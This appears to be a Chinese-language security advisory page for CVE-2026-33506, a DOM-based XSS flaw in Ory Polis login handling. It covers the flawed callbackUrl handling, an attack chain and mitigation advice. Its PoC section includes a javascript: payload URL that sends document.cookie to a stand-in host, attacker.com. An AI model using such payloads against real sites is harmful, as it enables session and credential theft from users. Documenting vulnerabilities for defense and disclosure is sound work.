CVE-2026-33506 CVSS 8.8 高危

CVE-2026-33506 Ory Polis DOM型跨站脚本漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33506

漏洞类型

DOM型跨站脚本 (DOM-based XSS)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Ory Polis

漏洞概述

Ory Polis 26.2.0之前的版本在登录功能中存在DOM型跨站脚本漏洞。应用程序不当信任`callbackUrl`参数并将其传递给`router.push`，导致攻击者可构造恶意链接。当受害者点击链接时，应用程序执行客户端重定向并运行任意JavaScript，进而造成凭证窃取、内网横向移动及未授权操作等严重后果。

技术细节

该漏洞的核心在于Ory Polis处理登录回调URL时的不安全实现。应用程序直接提取URL参数中的`callbackUrl`值，并未进行严格的格式校验或URL白名单限制，随后将其传递给前端的`router.push`方法进行页面跳转。这种处理方式允许攻击者使用`javascript:`伪协议构造Payload。攻击流程为：受害者访问包含恶意`callbackUrl`的链接 -> 应用前端调用`router.push` -> 浏览器执行`javascript:`后的代码。由于是DOM型XSS，恶意代码完全在客户端执行，能够绕过服务端的输入过滤。攻击者可利用此漏洞窃取Session ID、进行钓鱼攻击或利用受害者的权限对内部API发起请求，造成数据泄露或系统被控。

攻击链分析

STEP 1

侦察与准备

攻击者确认目标使用的是26.2.0之前的Ory Polis版本，并分析登录流程中callbackUrl参数的处理逻辑。

STEP 2

构造恶意链接

攻击者利用`javascript:`协议构造包含恶意JavaScript代码的callbackUrl参数，生成钓鱼链接。

STEP 3

诱骗点击

通过邮件或即时通讯工具将恶意链接发送给目标用户，诱导其点击。

STEP 4

客户端执行

用户点击链接后，Ory Polis前端将callbackUrl传递给router.push，触发浏览器执行恶意脚本。

STEP 5

达成攻击目的

恶意脚本在用户浏览器上下文中运行，窃取凭证或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-33506
The application takes the 'callbackUrl' parameter and passes it to router.push.
By using the javascript: protocol, we can execute arbitrary code.
-->

<!-- Malicious Link Example -->
https://[target-domain]/login?callbackUrl=javascript:alert('CVE-2026-33506')

<!-- Payload to steal cookies -->
https://[target-domain]/login?callbackUrl=javascript:fetch('https://attacker.com/steal?c='+document.cookie)

影响范围

Ory Polis < 26.2.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议部署Web应用防火墙（WAF）规则，拦截包含`javascript:`或可疑脚本的`callbackUrl`参数请求。同时，加强用户安全意识教育，不要随意点击不明来源的登录链接，并定期检查浏览器活动日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表